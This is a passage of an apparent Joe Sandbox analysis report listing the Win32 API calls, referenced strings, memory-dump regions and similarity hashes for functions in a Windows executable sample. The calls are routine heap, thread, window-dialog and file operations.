                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: a9125dc5e6675f3a5c8ff565d637a643d225863b8cf5efdab1d921be1d17f71e
                                      • Instruction ID: 6d87291edcf2eeb8e990bf82b01346f6326b2aefffcea0088477b931f0527044
                                      • Opcode Fuzzy Hash: a9125dc5e6675f3a5c8ff565d637a643d225863b8cf5efdab1d921be1d17f71e
                                      • Instruction Fuzzy Hash: 6EC04C717441007AD6509B24AE49F5776E9BB70702F00C4357545D15F5DB70EC50D768
                                      APIs
                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 00409B49
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: CreateHeap
                                      • String ID:
                                      • API String ID: 10892065-0
                                      • Opcode ID: 9eba7de511a5334458af75c1b88753425be16814361ea3c54108f6a3be7bfcb4
                                      • Instruction ID: 1bee1f37f93e9d35684b03c2e4756e6010034fad4ed660fefd81427f3766245b
                                      • Opcode Fuzzy Hash: 9eba7de511a5334458af75c1b88753425be16814361ea3c54108f6a3be7bfcb4
                                      • Instruction Fuzzy Hash: 2AB012702C43005AF2500B105C46B8039609304B43F304024B2015A1D4CBF0108045AC
                                      APIs
                                        • Part of subcall function 00408E58: wcslen.MSVCRT ref: 00408E64
                                        • Part of subcall function 00408E58: HeapAlloc.KERNEL32(00000000,00000000,?,00408F81,?), ref: 00408E7A
                                        • Part of subcall function 00408E58: wcscpy.MSVCRT ref: 00408E8B
                                      • GetStockObject.GDI32(00000011), ref: 00408FB2
                                      • LoadIconW.USER32 ref: 00408FE9
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00408FF9
                                      • RegisterClassExW.USER32 ref: 00409021
                                      • IsWindowEnabled.USER32(00000000), ref: 00409048
                                      • EnableWindow.USER32(00000000), ref: 00409059
                                      • GetSystemMetrics.USER32(00000001), ref: 00409091
                                      • GetSystemMetrics.USER32(00000000), ref: 0040909E
                                      • CreateWindowExW.USER32(00000000,00000000,10C80000,-00000096,?,?,?,?,?), ref: 004090BF
                                      • SetWindowLongW.USER32(00000000,000000EB,?), ref: 004090D3
                                      • CreateWindowExW.USER32(00000000,STATIC,?,5000000B,0000000A,0000000A,00000118,00000016,00000000,00000000,00000000), ref: 00409101
                                      • SendMessageW.USER32(00000000,00000030,00000001), ref: 00409119
                                      • CreateWindowExW.USER32(00000200,EDIT,00000000,00000000,0000000A,00000020,00000113,00000015,00000000,0000000A,00000000), ref: 00409157
                                      • SendMessageW.USER32(00000000,00000030,00000001), ref: 00409169
                                      • SetFocus.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409171
                                      • SendMessageW.USER32(0000000C,00000000,00000000), ref: 00409186
                                      • wcslen.MSVCRT ref: 00409189
                                      • wcslen.MSVCRT ref: 00409191
                                      • SendMessageW.USER32(000000B1,00000000,00000000), ref: 004091A3
                                      • CreateWindowExW.USER32(00000000,BUTTON,00413080,50010001,0000006E,00000043,00000050,00000019,00000000,000003E8,00000000), ref: 004091CD
                                      • SendMessageW.USER32(00000000,00000030,00000001), ref: 004091DF
                                      • CreateAcceleratorTableW.USER32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409216
                                      • SetForegroundWindow.USER32(00000000), ref: 0040921F
                                      • BringWindowToTop.USER32(00000000), ref: 00409226
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00409239
                                      • TranslateAcceleratorW.USER32(00000000,00000000,?), ref: 0040924A
                                      • TranslateMessage.USER32(?), ref: 00409259
                                      • DispatchMessageW.USER32(?), ref: 00409264
                                      • DestroyAcceleratorTable.USER32(00000000), ref: 00409278
                                      • wcslen.MSVCRT ref: 00409289
                                      • wcscpy.MSVCRT ref: 004092A1
                                      • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004092B4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: Window$Message$CreateSend$wcslen$Accelerator$HeapLoadMetricsSystemTableTranslatewcscpy$AllocBringClassCursorDestroyDispatchEnableEnabledFocusForegroundFreeIconLongObjectRegisterStock
                                      • String ID: 0$BUTTON$D0A$EDIT$STATIC
                                      • API String ID: 54849019-2968808370
                                      • Opcode ID: d18335faca37df58a642912671a5e6e9ed3b5d57d2cc689f0dbf3b56ae086657
                                      • Instruction ID: 83f6c24ff00e7acae504a8cc9f4403d446bfccf5cce4438541287e2077ea33a9
                                      • Opcode Fuzzy Hash: d18335faca37df58a642912671a5e6e9ed3b5d57d2cc689f0dbf3b56ae086657
                                      • Instruction Fuzzy Hash: 4E91A070648304BFE7219F64DC49F9B7FA9FB48B50F00893EF644A61E1CBB988448B59
                                      APIs
                                      • WriteFile.KERNEL32(?,00000000,?,?,00000000,?), ref: 00401637
                                        • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                        • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                        • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                        • Part of subcall function 004057F0: wcsncmp.MSVCRT ref: 00405853
                                        • Part of subcall function 004057F0: memmove.MSVCRT(00000000,00000000,?,00000000,00000000,?,?,-0000012C,?,?,004022A6,00000000,00000002,00000000,00000000,00417024), ref: 004058E1
                                        • Part of subcall function 004057F0: wcsncpy.MSVCRT ref: 004058F9
                                        • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                        • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(008C0000,00000000,?), ref: 0040DEF9
                                        • Part of subcall function 0040DEC0: RtlReAllocateHeap.NTDLL(008C0000,00000000,?,?), ref: 0040DF1C
                                        • Part of subcall function 0040A6C5: wcsncpy.MSVCRT ref: 0040A6E3
                                        • Part of subcall function 0040A6C5: wcslen.MSVCRT ref: 0040A6F5
                                        • Part of subcall function 0040A6C5: CreateDirectoryW.KERNELBASE(?,00000000), ref: 0040A735
                                        • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: AllocateErrorHeapLastValuewcslenwcsncpy$CreateDirectoryFileWritememmovewcsncmp
                                      • String ID: $pA$&pA$.pA$2pA$2pA$2pA$6pA$6pA$6pA$fpA$fpA$fpA$fpA$fpA
                                      • API String ID: 1295435411-3159487945
                                      • Opcode ID: d3a3a63bc2a0b99ba5975a07e2b9f90fb8c3599d1eca8c8031e60196fdd81d10
                                      • Instruction ID: b4e4a0b709d291d116e2253cfe1eb4aef96e8d0e4325569d50da54c09323f468
                                      • Opcode Fuzzy Hash: d3a3a63bc2a0b99ba5975a07e2b9f90fb8c3599d1eca8c8031e60196fdd81d10
                                      • Instruction Fuzzy Hash: E3B134B1504300AED600BBA1DD81E7F77A9EB88308F108D3FF544B61A2CA3DDD59966D
                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 00409373
                                        • Part of subcall function 0040E3F0: TlsGetValue.KERNEL32(0000000D,\\?\,?,004096ED,00000104,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 0040E3FA
                                      • memset.MSVCRT ref: 00409381
                                      • LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000000A), ref: 0040938E
                                      • GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 004093B0
                                      • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDListW), ref: 004093BC
                                      • wcsncpy.MSVCRT ref: 004093DD
                                      • wcslen.MSVCRT ref: 004093F1
                                      • CoTaskMemFree.OLE32(?), ref: 0040947A
                                      • wcslen.MSVCRT ref: 00409481
                                      • FreeLibrary.KERNEL32(00000000,00000000), ref: 004094A0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: AddressFreeLibraryProcwcslen$InitializeLoadTaskValuememsetwcsncpy
                                      • String ID: $0A$P$SHBrowseForFolderW$SHELL32.DLL$SHGetPathFromIDListW
                                      • API String ID: 4193992262-92458654
                                      • Opcode ID: 0c1c89229e1b22e48d7f066479dda1c34872fd3251ec2b755b1888499f20ca0d
                                      • Instruction ID: 23f57ca1c929181bfbc58391faabb4ebc57556df945843c0c8e437b0019b5ca4
                                      • Opcode Fuzzy Hash: 0c1c89229e1b22e48d7f066479dda1c34872fd3251ec2b755b1888499f20ca0d
                                      • Instruction Fuzzy Hash: D3416471508704AAC720EF759C49A9FBBE8EF88714F004C3FF945E3292D77899458B6A
                                      APIs
                                      • wcsncpy.MSVCRT ref: 00406405
                                        • Part of subcall function 0040E1E0: TlsGetValue.KERNEL32(0000000D,?,?,00405EC5,00001000,00001000,?,?,00001000,00402FE6,00000000,00000008,00000001,00000000,00000000,00000000), ref: 0040E1EA
                                      • _wcsdup.MSVCRT ref: 0040644E
                                      • _wcsdup.MSVCRT ref: 00406469
                                      • _wcsdup.MSVCRT ref: 0040648C
                                      • wcsncpy.MSVCRT ref: 00406578
                                      • free.MSVCRT ref: 004065DC
                                      • free.MSVCRT ref: 004065EF
                                      • free.MSVCRT ref: 00406602
                                      • wcsncpy.MSVCRT ref: 0040662E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: _wcsdupfreewcsncpy$Value
                                      • String ID: $0A$$0A$$0A
                                      • API String ID: 1554701960-360074770
                                      • Opcode ID: a2ec9853b1f56fd283991c6130850b28c29d3bdb2ca3b3670bd4453c3ae5a324
                                      • Instruction ID: a3954b37eea6ac6c251c7ba509b6f2d99b081bbe67bc4aeebc7e0be9c04ba548
                                      • Opcode Fuzzy Hash: a2ec9853b1f56fd283991c6130850b28c29d3bdb2ca3b3670bd4453c3ae5a324
                                      • Instruction Fuzzy Hash: 30A1BD715043019BCB209F18C881A2BB7F1EF94348F49093EF88667391E77AD965CB9A
                                      APIs
                                      • TlsAlloc.KERNEL32(?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004), ref: 00412092
                                      • InitializeCriticalSection.KERNEL32(00418688,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000), ref: 0041209E
                                      • TlsGetValue.KERNEL32(?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004), ref: 004120B4
                                      • HeapAlloc.KERNEL32(00000008,00000014,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 004120CE
                                      • EnterCriticalSection.KERNEL32(00418688,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000), ref: 004120DF
                                      • LeaveCriticalSection.KERNEL32(00418688,?,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 004120FB
                                      • GetCurrentProcess.KERNEL32(00000000,00100000,00000000,00000000,?,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000), ref: 00412114
                                      • GetCurrentThread.KERNEL32 ref: 00412117
                                      • GetCurrentProcess.KERNEL32(00000000,?,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 0041211E
                                      • DuplicateHandle.KERNEL32(00000000,?,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 00412121
                                      • RegisterWaitForSingleObject.KERNEL32(0000000C,00000000,0041217A,00000000,000000FF,00000008), ref: 00412137
                                      • TlsSetValue.KERNEL32(00000000,?,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 00412144
                                      • HeapAlloc.KERNEL32(00000000,0000000C,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 00412155
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: AllocCriticalCurrentSection$HeapProcessValue$DuplicateEnterHandleInitializeLeaveObjectRegisterSingleThreadWait
                                      • String ID:
                                      • API String ID: 298514914-0
                                      • Opcode ID: 090f9e8ec264e5d12bc44ccd603b7065f48900f7029304d299a0ea3cd3686378
                                      • Instruction ID: d80fd07e77255670f12a4e616af7295cf706cbaed93ad9a0fedfb01b657d880b
                                      • Opcode Fuzzy Hash: 090f9e8ec264e5d12bc44ccd603b7065f48900f7029304d299a0ea3cd3686378
                                      • Instruction Fuzzy Hash: 35211971644305FFDB119F64ED88B963FBAFB49311F04C43AFA09962A1CBB49850DB68
                                      APIs
                                      • LoadLibraryW.KERNEL32(Kernel32.dll,00000000,00000000,00000000,00000004,00000000,0040D855,0041861C,0040D9E2,00000000,FFFFFFED,00000200,76ED5E70,00409E76,FFFFFFED,00000010), ref: 0040DA51
                                      • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 0040DA66
                                      • FreeLibrary.KERNEL32(00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040DA81
                                      • InterlockedCompareExchange.KERNEL32(00000000,00000001,00000000), ref: 0040DA90
                                      • Sleep.KERNEL32(00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040DAA2
                                      • InterlockedExchange.KERNEL32(00000000,00000002), ref: 0040DAB5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: ExchangeInterlockedLibrary$AddressCompareFreeLoadProcSleep
                                      • String ID: InitOnceExecuteOnce$Kernel32.dll
                                      • API String ID: 2918862794-1339284965
                                      • Opcode ID: 04ec49063c38c3d68cea197a5330db743d42037b633bf3bb84411c831da1e2b1
                                      • Instruction ID: e7d3430369b103de8e34323ddaa6381870798cc52ac97d2691a1b23ef8b22f52
                                      • Opcode Fuzzy Hash: 04ec49063c38c3d68cea197a5330db743d42037b633bf3bb84411c831da1e2b1
                                      • Instruction Fuzzy Hash: A701B132748204BAD7116FE49C49FEB3B29EF42762F10813AF905A11C0DB7C49458A6D
                                      APIs
                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00409511
                                      • GetCurrentThreadId.KERNEL32 ref: 0040951F
                                      • IsWindowVisible.USER32(?), ref: 00409526
                                        • Part of subcall function 0040DB72: HeapAlloc.KERNEL32(00000008,00000000,0040D3EC,00418610,00000014,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000), ref: 0040DB7E
                                      • GetCurrentThreadId.KERNEL32 ref: 00409543
                                      • GetWindowLongW.USER32(?,000000EC), ref: 00409550
                                      • GetForegroundWindow.USER32 ref: 0040955E
                                      • IsWindowEnabled.USER32(?), ref: 00409569
                                      • EnableWindow.USER32(?,00000000), ref: 00409579
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: Window$Thread$Current$AllocEnableEnabledForegroundHeapLongProcessVisible
                                      • String ID:
                                      • API String ID: 3383493704-0
                                      • Opcode ID: 761db0cbe0c8efe4181c57131f09a45cb1cea28f7de62a6f083fb5992236dbff
                                      • Instruction ID: 9be2ebae674c1fa36b8fc713cd4e728ef3198b0ad07c7790c0b3041e5f2a4f9d
                                      • Opcode Fuzzy Hash: 761db0cbe0c8efe4181c57131f09a45cb1cea28f7de62a6f083fb5992236dbff
                                      • Instruction Fuzzy Hash: A901B9315083016FD3215B769C88AABBAB8AF55750B04C03EF456D3191D7749C40C66D
                                      APIs
                                      • DestroyWindow.USER32(?), ref: 00408EED
                                      • GetWindowLongW.USER32(?,000000EB), ref: 00408EFC
                                      • GetWindowTextLengthW.USER32 ref: 00408F0A
                                      • HeapAlloc.KERNEL32(00000000), ref: 00408F1F
                                      • GetWindowTextW.USER32(00000000,00000001), ref: 00408F2F
                                      • DestroyWindow.USER32(?), ref: 00408F3D
                                      • UnregisterClassW.USER32 ref: 00408F53
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: Window$DestroyText$AllocClassHeapLengthLongUnregister
                                      • String ID:
                                      • API String ID: 2895088630-0
                                      • Opcode ID: cc61bfd3fa705e2cc6efe011ffba927a9334bb0a4f310b6a0f05db5f7333bb42
                                      • Instruction ID: dcdd979020c5d84d31bdac08dec077088d7257a56d77306a58cab45369b049af
                                      • Opcode Fuzzy Hash: cc61bfd3fa705e2cc6efe011ffba927a9334bb0a4f310b6a0f05db5f7333bb42
                                      • Instruction Fuzzy Hash: C611183110810ABFCB116F64ED4C9E63F76EB08361B00C53AF44592AB0CF359955EB58
                                      APIs
                                      • EnumWindows.USER32(00409507,?), ref: 0040959B
                                      • GetCurrentThreadId.KERNEL32 ref: 004095B3
                                      • SetWindowPos.USER32(?,000000FE,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?), ref: 004095CF
                                      • GetCurrentThreadId.KERNEL32 ref: 004095EF
                                      • EnableWindow.USER32(?,00000001), ref: 00409605
                                      • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?), ref: 0040961C
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: Window$CurrentThread$EnableEnumWindows
                                      • String ID:
                                      • API String ID: 2527101397-0
                                      • Opcode ID: f28d4ca554cd3ae9a733ad6cb4d62ecbd868711740a6e1fed135e0e6fc6d1c23
                                      • Instruction ID: f5a6386b144a933a28a8080deaf79be6790ca9cb7a06763c23f847dded1acd22
                                      • Opcode Fuzzy Hash: f28d4ca554cd3ae9a733ad6cb4d62ecbd868711740a6e1fed135e0e6fc6d1c23
                                      • Instruction Fuzzy Hash: 3E11AF32548741BBD7324B16EC48F577BB9EB81B20F14CA3EF052226E1DB766D44CA18
                                      APIs
                                      • TlsAlloc.KERNEL32(?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D378
                                      • HeapAlloc.KERNEL32(00000008,00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D38C
                                      • TlsSetValue.KERNEL32(00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D399
                                      • TlsGetValue.KERNEL32(00000010,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D3B0
                                      • HeapReAlloc.KERNEL32(00000008,00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D3BF
                                      • TlsSetValue.KERNEL32(00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D3CE
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: AllocValue$Heap
                                      • String ID:
                                      • API String ID: 2472784365-0
                                      • Opcode ID: d4aa023bea7065d4958094be2e1b0a1f42a8661c5ef268aa00a39480e26025ae
                                      • Instruction ID: 1e11015e4a25d7f5304c1c18fd55a95fd758b035f13ce6db6bcec7fc4f8c26ab
                                      • Opcode Fuzzy Hash: d4aa023bea7065d4958094be2e1b0a1f42a8661c5ef268aa00a39480e26025ae
                                      • Instruction Fuzzy Hash: 22116372A45310AFD7109FA5EC84A967BA9FB58760B05803EF904D33B2DB359C048AAC
                                      APIs
                                      • UnregisterWait.KERNEL32(?), ref: 0041200E
                                      • CloseHandle.KERNEL32(?,?,?,?,0041218A,?), ref: 00412017
                                      • EnterCriticalSection.KERNEL32(00418688,?,?,?,0041218A,?), ref: 00412023
                                      • LeaveCriticalSection.KERNEL32(00418688,?,?,?,0041218A,?), ref: 00412048
                                      • HeapFree.KERNEL32(00000000,00000000,?,?,?,0041218A,?), ref: 00412066
                                      • HeapFree.KERNEL32(?,?,?,?,?,0041218A,?), ref: 00412078
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: CriticalFreeHeapSection$CloseEnterHandleLeaveUnregisterWait
                                      • String ID:
                                      • API String ID: 4204870694-0
                                      • Opcode ID: 74c8b0c47b40b3dfa83cc76d0e2e37435eae102b1f5068a19a02dca3843f56c7
                                      • Instruction ID: 90751bbfb1e58074f86cd24fa3ef9024ec02ad1f71581e15228f0d3cd8da5416
                                      • Opcode Fuzzy Hash: 74c8b0c47b40b3dfa83cc76d0e2e37435eae102b1f5068a19a02dca3843f56c7
                                      • Instruction Fuzzy Hash: F5012970201601EFC7249F11EE88A96BF75FF493557108539E61AC2A70C731A821DBA8
                                      APIs
                                      • wcsncmp.MSVCRT ref: 00405853
                                      • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,?,?,-0000012C,?,?,004022A6,00000000,00000002,00000000,00000000,00417024), ref: 004058E1
                                      • wcsncpy.MSVCRT ref: 004058F9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: memmovewcsncmpwcsncpy
                                      • String ID: $0A$$0A
                                      • API String ID: 1452150355-167650565
                                      • Opcode ID: d76f75147769cfeda3015acce6fec10c4d54059df292c5d7079ca0585360228a
                                      • Instruction ID: fc6078814c183f32d07ee1b1bbfb59dc2b99a9263d9aed9d6ca5449e395b5937
                                      • Opcode Fuzzy Hash: d76f75147769cfeda3015acce6fec10c4d54059df292c5d7079ca0585360228a
                                      • Instruction Fuzzy Hash: 4C31D536904B058BC720FF55888057B77A8EE84344F14893EEC85373C2EB799D61DBAA
                                      APIs
                                      • memset.MSVCRT ref: 00405562
                                      • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,00000000), ref: 00405571
